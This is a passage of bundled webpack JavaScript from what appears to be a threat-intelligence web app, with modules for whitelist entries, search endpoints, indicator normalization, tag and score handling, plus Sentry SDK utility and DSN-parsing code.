/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "companyWhitelistEntries", function() { return companyWhitelistEntries; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "loading", function() { return loading; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "modalOpen", function() { return modalOpen; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "currentQuery", function() { return currentQuery; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "defaultPayload", function() { return defaultPayload; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "defaultResult", function() { return defaultResult; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_trustar_utils__ = __webpack_require__(5);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__defaults__ = __webpack_require__(1412);




var companyWhitelistEntries = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['companyWhitelist', 'entries']);
var loading = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['companyWhitelist', 'loading']);
var modalOpen = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['companyWhitelist', 'modalOpen']);
var currentQuery = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['companyWhitelist', 'currentQuery']);

var defaultPayload = Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["Map"])({
  query: '',
  sort: Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["Map"])(__WEBPACK_IMPORTED_MODULE_2__defaults__["sorterValues"].searchSorters),
  pageNumber: 0,
  pageSize: 25
});

var defaultResult = Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["Map"])({
  empty: true,
  items: Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["List"])() // PAGE SIZE and stuff? TODO
});

/***/ }),
/* 759 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "Options", function() { return Options; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "WhitelistEntry", function() { return WhitelistEntry; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "WhitelistPage", function() { return WhitelistPage; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_immutable__ = __webpack_require__(1);


var Options = Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Record"])({
  query: '',
  pageNumber: 0,
  pageSize: 25,
  sortBy: 'name',
  sortOrder: 'DESC'
});

var WhitelistEntry = Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Record"])({
  nodeType: '',
  id: '',
  type: '',
  value: '',
  indicatorType: '',
  priorityLevel: '',
  whitelistedBy: '',
  guid: '',
  pattern: '',
  text: ''
});

// Like payload action but also supports field to update


var WhitelistPage = function WhitelistPage(pageObject) {
  return Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["fromJS"])(pageObject);
};

/***/ }),
/* 760 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "makeCompanyWhitelistEndpoint", function() { return makeCompanyWhitelistEndpoint; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "normalizeWhitelistEntry", function() { return normalizeWhitelistEntry; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__constants__ = __webpack_require__(1413);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_modules_profile_getters__ = __webpack_require__(142);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_immutable__ = __webpack_require__(1);




var makeCompanyWhitelistEndpoint = function makeCompanyWhitelistEndpoint(store) {
  return __WEBPACK_IMPORTED_MODULE_0__constants__["COMPANY_ENDPOINT"] + '/' + Object(__WEBPACK_IMPORTED_MODULE_1_modules_profile_getters__["companyId"])(store.getState()) + '/whitelist-terms';
};

/* Normalizes whitelist records */
var normalizeWhitelistEntry = function normalizeWhitelistEntry(entry) {
  return Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["Record"])(entry)();
};

/***/ }),
/* 761 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "iocsEndpoint", function() { return iocsEndpoint; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "reportsEndpoint", function() { return reportsEndpoint; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "pageSize", function() { return pageSize; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "searchV3Endpoint", function() { return searchV3Endpoint; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "searchV3ReportEndpoint", function() { return searchV3ReportEndpoint; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "searchV3EntityEndpoint", function() { return searchV3EntityEndpoint; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "UPDATE_ENTIRE_QUERY_OBJECT", function() { return UPDATE_ENTIRE_QUERY_OBJECT; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "SORTER", function() { return SORTER; });


/* search endpoints */
var iocsEndpoint = '/services/search/v2/iocs';
var reportsEndpoint = '/services/search/v2/reports';

/* page size for queries */
var pageSize = 20;

/* Search 2.0 endpoints */
var searchV3Endpoint = '/services/search/v3';
var searchV3ReportEndpoint = '/services/search/v3/reports';
var searchV3EntityEndpoint = '/services/search/v3/entities';
var UPDATE_ENTIRE_QUERY_OBJECT = 'all';
var SORTER = 'sort';

/***/ }),
/* 762 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return normalizeIndicatorShape; });
/* unused harmony export normalizeIndicatorShapeImmutable */
/* unused harmony export indicatorToId */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_immutable__ = __webpack_require__(1);
var _extends = Object.assign || function (target) { for (var i = 1; i < arguments.length; i++) { var source = arguments[i]; for (var key in source) { if (Object.prototype.hasOwnProperty.call(source, key)) { target[key] = source[key]; } } } return target; };

function _defineProperty(obj, key, value) { if (key in obj) { Object.defineProperty(obj, key, { value: value, enumerable: true, configurable: true, writable: true }); } else { obj[key] = value; } return obj; }



// Normalize indicator like object
var normalizeIndicatorShape = function normalizeIndicatorShape(indicatorLike) {
  var type = indicatorLike.indicatorType || indicatorLike.type;
  var value = indicatorLike.value;

  var enclaves = indicatorLike.enclaveIds ? indicatorLike.enclaveIds : indicatorLike.enclaveGuids ? indicatorLike.enclaveGuids : indicatorLike.enclaves;

  var occurrences = indicatorLike.sightings ? Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Map"])(_defineProperty({}, indicatorLike.sightings, indicatorLike.sightings)) : Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Map"])({});

  return _extends({}, indicatorLike, {
    type: type,
    value: value,
    enclaves: enclaves,
    occurrences: occurrences,
    id: type + '|' + value
  });
};

// Normalize indicator like Map object
var normalizeIndicatorShapeImmutable = function normalizeIndicatorShapeImmutable(indicatorLikeImmutable) {
  if (!indicatorLikeImmutable) return Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Map"])();
  return Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Map"])(normalizeIndicatorShape(indicatorLikeImmutable.toJS()));
};

// Creates the unique type|value ID for an indicator-like object
var indicatorToId = function indicatorToId(ioc) {
  try {
    var _type = void 0,
        _value = void 0;

    if (__WEBPACK_IMPORTED_MODULE_0_immutable__["Map"].isMap(ioc)) {
      _type = ioc.get('type');
      _value = ioc.get('value');
    } else {
      _type = ioc.type;
      _value = ioc.value;
    }

    if (!_type || !_value) {
      throw new Error('Trying to generate indicator ID but indicator was invalid.');
    }

    return _type + '|' + _value;
  } catch (err) {
    console.error('Tried to generate an indicator ID with invalid input:', ioc);
    throw err;
  }
};

/***/ }),
/* 763 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "formatTagsToBulk", function() { return formatTagsToBulk; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "formatBulkTagResponse", function() { return formatBulkTagResponse; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "bulkTagSuccessMessage", function() { return bulkTagSuccessMessage; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_trustar_utils_utils_js__ = __webpack_require__(78);



var formatTagsToBulk = function formatTagsToBulk(tags, tagsToRemove) {
  var tagPayloadInit = {
    addedTags: Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["List"])(),
    removedTags: Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["List"])()
  };

  var output = {
    addedTags: tags.map(function (currentTag) {
      return {
        name: currentTag.name,
        enclaveId: currentTag.enclaveGuid || currentTag.enclaveId
      };
    }),
    removedTags: tagsToRemove.map(function (currentTag) {
      return {
        name: currentTag.name,
        enclaveId: currentTag.enclaveGuid || currentTag.enclaveId
      };
    })
  };

  return output;
};

var formatBulkTagResponse = function formatBulkTagResponse(tagResponseObjectOrMap, enclaveTagCombinations) {
  var tagResponse = Object(__WEBPACK_IMPORTED_MODULE_1_trustar_utils_utils_js__["isImmutable"])(tagResponseObjectOrMap) ? tagResponseObjectOrMap : Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["fromJS"])(tagResponseObjectOrMap);

  var tagsToEnclavesIds = enclaveTagCombinations.reduce(function (tagMap, current) {
    return tagMap.set(current.name, current.enclaveId);
  }, Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Map"])());
  var retroFittedTagsWithEnclaveIds = tagResponse.update('addedTags', function (addedTags) {
    return addedTags.map(function (tagMapOrObject) {
      var tag = Object(__WEBPACK_IMPORTED_MODULE_1_trustar_utils_utils_js__["isImmutable"])(tagMapOrObject) ? tagMapOrObject : Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Map"])(tagMapOrObject);
      return tag.set('enclaveId', tagsToEnclavesIds.get(tag.get('name')));
    });
  }).update('removedTags', function (removedTags) {
    return removedTags.map(function (tagMapOrObject) {
      var tag = Object(__WEBPACK_IMPORTED_MODULE_1_trustar_utils_utils_js__["isImmutable"])(tagMapOrObject) ? tagMapOrObject : Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Map"])(tagMapOrObject);
      return tag.set('enclaveId', tagsToEnclavesIds.get(tag.get('name')));
    });
  });
  return retroFittedTagsWithEnclaveIds;
};

var bulkTagSuccessMessage = function bulkTagSuccessMessage() {
  var addedTags = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["List"])();
  var removedTags = arguments.length > 1 && arguments[1] !== undefined ? arguments[1] : Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["List"])();

  var totalAddedTags = addedTags && addedTags.length ? addedTags.length : 0;
  var totalRemovedTags = removedTags && removedTags.length ? removedTags.length : 0;
  var successMessage = (totalAddedTags ? totalAddedTags + (totalAddedTags === 1 ? ' tag ' : ' tags ') + 'added' : '') + '\n        ' + (totalAddedTags && totalRemovedTags ? ' and ' : '') + '\n        ' + (totalRemovedTags ? totalRemovedTags + (totalRemovedTags === 1 ? ' tag ' : ' tags ') + 'removed' : '');

  return successMessage;
};

/***/ }),
/* 764 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "f", function() { return UPDATE_PAGE_FILTERS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "e", function() { return RESET_PAGE_FILTERS; });
/* unused harmony export FETCH_ALL_ENTITY_SCORES */
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return FETCH_ENTITY_SCORES_PAGE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "d", function() { return FETCH_ENTITY_SCORES_PAGE_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "c", function() { return FETCH_ENTITY_SCORES_PAGE_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return CLEAR_SCORE_SORT_OPTIONS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "h", function() { return UPDATE_SCORE_SORT_OPTIONS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "g", function() { return UPDATE_SCORE_SORT_DIRECTION; });
var prefix = function prefix(str) {
  return 'station/entity-scores/' + str;
};

var UPDATE_PAGE_FILTERS = prefix('UPDATE_PAGE_FILTERS');
var RESET_PAGE_FILTERS = prefix('RESET_PAGE_FILTERS');

var FETCH_ALL_ENTITY_SCORES = prefix('FETCH_ALL_ENTITY_SCORES');
var FETCH_ENTITY_SCORES_PAGE = prefix('FETCH_ENTITY_SCORES_PAGE');
var FETCH_ENTITY_SCORES_PAGE_SUCCESS = prefix('FETCH_ENTITY_SCORES_PAGE_SUCCESS');
var FETCH_ENTITY_SCORES_PAGE_FAILURE = prefix('FETCH_ENTITY_SCORES_PAGE_FAILURE');

var CLEAR_SCORE_SORT_OPTIONS = prefix('CLEAR_SCORE_SORT_OPTIONS');

var UPDATE_SCORE_SORT_OPTIONS = prefix('UPDATE_SCORE_SORT_OPTIONS');

var UPDATE_SCORE_SORT_DIRECTION = prefix('UPDATE_SCORE_SORT_DIRECTION');

/***/ }),
/* 765 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* unused harmony export sortOptions */
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return sortComparators; });
/* unused harmony export scoreSortOptions */
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return getDefaultScoreSortOption; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "c", function() { return sorterValues; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_immutable__ = __webpack_require__(1);


var sortOptions = [{
  text: 'Newest to Oldest Updated',
  sort: {
    sortBy: 'updated',
    sortDirection: 'DESC'
  }
}, {
  text: 'Oldest to Newest Updated',
  sort: {
    sortBy: 'updated',
    sortDirection: 'ASC'
  }
}, {
  text: 'Newest to Oldest Created',
  sort: {
    sortBy: 'created',
    sortDirection: 'DESC'
  }
}, {
  text: 'Oldest to Newest Created',
  sort: {
    sortBy: 'created',
    sortDirection: 'ASC'
  }
}];

var sortComparators = {
  ASC: function ASC(a, b) {
    return a > b;
  },
  DESC: function DESC(a, b) {
    return a < b;
  }
};

var scoreSortOptions = Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["fromJS"])([{
  key: 'updated',
  displayName: 'Updated A-Z',
  sortByKey: function sortByKey(score) {
    return score.get('updated');
  }
}, {
  key: 'sourceName',
  displayName: 'Source Name',
  sortByKey: function sortByKey(score) {
    return score.getIn(['source', 'key']);
  }
}, {
  key: 'scoreName',
  displayName: 'Score Name',
  sortByKey: function sortByKey(score) {
    return score.getIn(['score', 'name']);
  }
}]);

var getDefaultScoreSortOption = function getDefaultScoreSortOption() {
  return scoreSortOptions.get(0);
};

var sorterValues = {
  searchSorterPlaceholder: 'Select',
  searchSorters: sortOptions[0]
};

/***/ }),
/* 766 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "entities", function() { return entities; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "scores", function() { return scores; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "sortScore", function() { return sortScore; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "loading", function() { return loading; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "modalOpen", function() { return modalOpen; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "currentQuery", function() { return currentQuery; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "currentQueryWithEntities", function() { return currentQueryWithEntities; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "scoresByEntity", function() { return scoresByEntity; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "defaultPayload", function() { return defaultPayload; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "defaultResult", function() { return defaultResult; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_trustar_utils__ = __webpack_require__(5);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_modules_constellation__ = __webpack_require__(403);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__defaults__ = __webpack_require__(765);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_reselect__ = __webpack_require__(34);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_reselect___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_4_reselect__);







var entities = Object(__WEBPACK_IMPORTED_MODULE_4_reselect__["createSelector"])(__WEBPACK_IMPORTED_MODULE_2_modules_constellation__["c" /* getters */].currentReportOrListItem, function (report) {
  return report.get('indicators', Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["List"])()).map(function (d) {
    return d.get('value', null);
  }).toSet();
});

var scores = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['entityScores', 'scores']);
var sortScore = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['entityScores', 'sort', 'scores']);
var loading = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['entityScores', 'loading']);
var modalOpen = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['entityScores', 'modalOpen']);
var currentQuery = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['entityScores', 'currentQuery']);

var currentQueryWithEntities = Object(__WEBPACK_IMPORTED_MODULE_4_reselect__["createSelector"])(currentQuery, entities, function (currentQuery, entities) {
  return currentQuery.set('query', entities);
});

var scoresByEntity = Object(__WEBPACK_IMPORTED_MODULE_4_reselect__["createSelector"])(scores, entities, sortScore, function (scores, entities, sortScore) {
  return scores.filter(function (current) {
    return entities.has(current.get('value'));
  }).reduce(function (acc, current, i, arr) {
    if (!acc.has(current.get('value'))) {
      acc = acc.set(current.get('value'), Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["List"])());
    }
    return acc.update(current.get('value'), function (l) {
      return l.push(current);
    });
  }, Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["OrderedMap"])()).map(function (scoreList) {
    return scoreList.sortBy(sortScore.get('sortByKey'), sortScore.dir);
  });
});

var defaultPayload = Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["Map"])({
  query: '',
  sort: Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["Map"])(__WEBPACK_IMPORTED_MODULE_3__defaults__["c" /* sorterValues */].searchSorters),
  pageNumber: 0,
  pageSize: 25
});

var defaultResult = Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["Map"])({
  empty: true,
  items: Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["List"])() // PAGE SIZE and stuff? TODO
});

/***/ }),
/* 767 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* unused harmony export Options */
/* unused harmony export ScoresEntry */
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return ScoresPage; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_immutable__ = __webpack_require__(1);


var Options = Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Record"])({
  query: '',
  pageNumber: 0,
  pageSize: 25,
  sortBy: 'name',
  sortOrder: 'DESC'
});

var ScoresEntry = Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Record"])({
  guid: '',
  pattern: '',
  text: ''
});

// Like payload action but also supports field to update


var ScoresPage = function ScoresPage(pageObject) {
  return Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["fromJS"])(pageObject);
};

/***/ }),
/* 768 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "c", function() { return GLOBAL_ERROR_THROW; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return GLOBAL_ERROR_CAUGHT; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return GLOBAL_ERROR_ACKNOWLEDGED; });
var prefix = function prefix(str) {
  return 'station/errors/' + str;
};

var GLOBAL_ERROR_THROW = prefix('GLOBAL_ERROR_THROW');
var GLOBAL_ERROR_CAUGHT = prefix('GLOBAL_ERROR_CAUGHT');
var GLOBAL_ERROR_ACKNOWLEDGED = prefix('GLOBAL_ERROR_ACKNOWLEDGED');

/***/ }),
/* 769 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* WEBPACK VAR INJECTION */(function(process, global) {/* harmony export (immutable) */ __webpack_exports__["c"] = dynamicRequire;
/* unused harmony export isNodeEnv */
/* harmony export (immutable) */ __webpack_exports__["e"] = getGlobalObject;
/* harmony export (immutable) */ __webpack_exports__["g"] = uuid4;
/* harmony export (immutable) */ __webpack_exports__["f"] = parseUrl;
/* harmony export (immutable) */ __webpack_exports__["d"] = getEventDescription;
/* harmony export (immutable) */ __webpack_exports__["b"] = consoleSandbox;
/* harmony export (immutable) */ __webpack_exports__["a"] = addExceptionTypeValue;
/**
 * Requires a module which is protected _against bundler minification.
 *
 * @param request The module path to resolve
 */
function dynamicRequire(mod, request) {
    // tslint:disable-next-line: no-unsafe-any
    return mod.require(request);
}
/**
 * Checks whether we're in the Node.js or Browser environment
 *
 * @returns Answer to given question
 */
function isNodeEnv() {
    // tslint:disable:strict-type-predicates
    return Object.prototype.toString.call(typeof process !== 'undefined' ? process : 0) === '[object process]';
}
var fallbackGlobalObject = {};
/**
 * Safely get global scope object
 *
 * @returns Global scope object
 */
function getGlobalObject() {
    return (isNodeEnv()
        ? global
        : typeof window !== 'undefined'
            ? window
            : typeof self !== 'undefined'
                ? self
                : fallbackGlobalObject);
}
/**
 * UUID4 generator
 *
 * @returns string Generated UUID4.
 */
function uuid4() {
    var global = getGlobalObject();
    var crypto = global.crypto || global.msCrypto;
    if (!(crypto === void 0) && crypto.getRandomValues) {
        // Use window.crypto API if available
        var arr = new Uint16Array(8);
        crypto.getRandomValues(arr);
        // set 4 in byte 7
        // tslint:disable-next-line:no-bitwise
        arr[3] = (arr[3] & 0xfff) | 0x4000;
        // set 2 most significant bits of byte 9 to '10'
        // tslint:disable-next-line:no-bitwise
        arr[4] = (arr[4] & 0x3fff) | 0x8000;
        var pad = function (num) {
            var v = num.toString(16);
            while (v.length < 4) {
                v = "0" + v;
            }
            return v;
        };
        return (pad(arr[0]) + pad(arr[1]) + pad(arr[2]) + pad(arr[3]) + pad(arr[4]) + pad(arr[5]) + pad(arr[6]) + pad(arr[7]));
    }
    // http://stackoverflow.com/questions/105034/how-to-create-a-guid-uuid-in-javascript/2117523#2117523
    return 'xxxxxxxxxxxx4xxxyxxxxxxxxxxxxxxx'.replace(/[xy]/g, function (c) {
        // tslint:disable-next-line:no-bitwise
        var r = (Math.random() * 16) | 0;
        // tslint:disable-next-line:no-bitwise
        var v = c === 'x' ? r : (r & 0x3) | 0x8;
        return v.toString(16);
    });
}
/**
 * Parses string form of URL into an object
 * // borrowed from https://tools.ietf.org/html/rfc3986#appendix-B
 * // intentionally using regex and not <a/> href parsing trick because React Native and other
 * // environments where DOM might not be available
 * @returns parsed URL object
 */
function parseUrl(url) {
    if (!url) {
        return {};
    }
    var match = url.match(/^(([^:\/?#]+):)?(\/\/([^\/?#]*))?([^?#]*)(\?([^#]*))?(#(.*))?$/);
    if (!match) {
        return {};
    }
    // coerce to undefined values to empty string so we don't get 'undefined'
    var query = match[6] || '';
    var fragment = match[8] || '';
    return {
        host: match[4],
        path: match[5],
        protocol: match[2],
        relative: match[5] + query + fragment,
    };
}
/**
 * Extracts either message or type+value from an event that can be used for user-facing logs
 * @returns event's description
 */
function getEventDescription(event) {
    if (event.message) {
        return event.message;
    }
    if (event.exception && event.exception.values && event.exception.values[0]) {
        var exception = event.exception.values[0];
        if (exception.type && exception.value) {
            return exception.type + ": " + exception.value;
        }
        return exception.type || exception.value || event.event_id || '<unknown>';
    }
    return event.event_id || '<unknown>';
}
/** JSDoc */
function consoleSandbox(callback) {
    var global = getGlobalObject();
    var levels = ['debug', 'info', 'warn', 'error', 'log', 'assert'];
    if (!('console' in global)) {
        return callback();
    }
    var originalConsole = global.console;
    var wrappedLevels = {};
    // Restore all wrapped console methods
    levels.forEach(function (level) {
        if (level in global.console && originalConsole[level].__sentry__) {
            wrappedLevels[level] = originalConsole[level].__sentry_wrapped__;
            originalConsole[level] = originalConsole[level].__sentry_original__;
        }
    });
    // Perform callback manipulations
    var result = callback();
    // Revert restoration to wrapped state
    Object.keys(wrappedLevels).forEach(function (level) {
        originalConsole[level] = wrappedLevels[level];
    });
    return result;
}
/**
 * Adds exception values, type and value to an synthetic Exception.
 * @param event The event to modify.
 * @param value Value of the exception.
 * @param type Type of the exception.
 * @param mechanism Mechanism of the exception.
 * @hidden
 */
function addExceptionTypeValue(event, value, type, mechanism) {
    if (mechanism === void 0) { mechanism = {
        handled: true,
        type: 'generic',
    }; }
    event.exception = event.exception || {};
    event.exception.values = event.exception.values || [];
    event.exception.values[0] = event.exception.values[0] || {};
    event.exception.values[0].value = event.exception.values[0].value || value || '';
    event.exception.values[0].type = event.exception.values[0].type || type || 'Error';
    event.exception.values[0].mechanism = event.exception.values[0].mechanism || mechanism;
}
//# sourceMappingURL=misc.js.map
/* WEBPACK VAR INJECTION */}.call(__webpack_exports__, __webpack_require__(83), __webpack_require__(17)))

/***/ }),
/* 770 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return Dsn; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_tslib__ = __webpack_require__(64);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__sentry_utils__ = __webpack_require__(53);


/** Regular expression used to parse a Dsn. */
var DSN_REGEX = /^(?:(\w+):)\/\/(?:(\w+)(?::(\w+))?@)([\w\.-]+)(?::(\d+))?\/(.+)/;
/** Error message */
var ERROR_MESSAGE = 'Invalid Dsn';
/** The Sentry Dsn, identifying a Sentry instance and project. */
var Dsn = /** @class */ (function () {
    /** Creates a new Dsn component */
    function Dsn(from) {
        if (typeof from === 'string') {
            this._fromString(from);
        }
        else {
            this._fromComponents(from);
        }
        this._validate();
    }
    /**
     * Renders the string representation of this Dsn.
     *
     * By default, this will render the public representation without the password
     * component. To get the deprecated private _representation, set `withPassword`
     * to true.
     *
     * @param withPassword When set to true, the password will be included.
     */
    Dsn.prototype.toString = function (withPassword) {
        if (withPassword === void 0) { withPassword = false; }
        // tslint:disable-next-line:no-this-assignment
        var _a = this, host = _a.host, path = _a.path, pass = _a.pass, port = _a.port, projectId = _a.projectId, protocol = _a.protocol, user = _a.user;
        return (protocol + "://" + user + (withPassword && pass ? ":" + pass : '') +
            ("@" + host + (port ? ":" + port : '') + "/" + (path ? path + "/" : path) + projectId));
    };
    /** Parses a string into this Dsn. */
    Dsn.prototype._fromString = function (str) {
        var match = DSN_REGEX.exec(str);
        if (!match) {
            throw new __WEBPACK_IMPORTED_MODULE_1__sentry_utils__["b" /* SentryError */](ERROR_MESSAGE);
        }
        var _a = __WEBPACK_IMPORTED_MODULE_0_tslib__["e" /* __read */](match.slice(1), 6), protocol = _a[0], user = _a[1], _b = _a[2], pass = _b === void 0 ? '' : _b, host = _a[3], _c = _a[4], port = _c === void 0 ? '' : _c, lastPath = _a[5];
        var path = '';
        var projectId = lastPath;
        var split = projectId.split('/');
        if (split.length > 1) {
            path = split.slice(0, -1).join('/');
            projectId = split.pop();
        }
        Object.assign(this, { host: host, pass: pass, path: path, projectId: projectId, port: port, protocol: protocol, user: user });
    };
    /** Maps Dsn components into this instance. */
    Dsn.prototype._fromComponents = function (components) {
        this.protocol = components.protocol;
        this.user = components.user;
        this.pass = components.pass || '';
        this.host = components.host;
        this.port = components.port || '';
        this.path = components.path || '';
        this.projectId = components.projectId;
    };
    /** Validates this Dsn and throws on error. */
    Dsn.prototype._validate = function () {
        var _this = this;
        ['protocol', 'user', 'host', 'projectId'].forEach(function (component) {
            if (!_this[component]) {
                throw new __WEBPACK_IMPORTED_MODULE_1__sentry_utils__["b" /* SentryError */](ERROR_MESSAGE);
            }
        });
        if (this.protocol !== 'http' && this.protocol !== 'https') {
            throw new __WEBPACK_IMPORTED_MODULE_1__sentry_utils__["b" /* SentryError */](ERROR_MESSAGE);
        }
        if (this.port && Number.isNaN(parseInt(this.port, 10))) {
            throw new __WEBPACK_IMPORTED_MODULE_1__sentry_utils__["b" /* SentryError */](ERROR_MESSAGE);
        }
    };
    return Dsn;
}());

//# sourceMappingURL=dsn.js.map

/***/ }),
/* 771 */
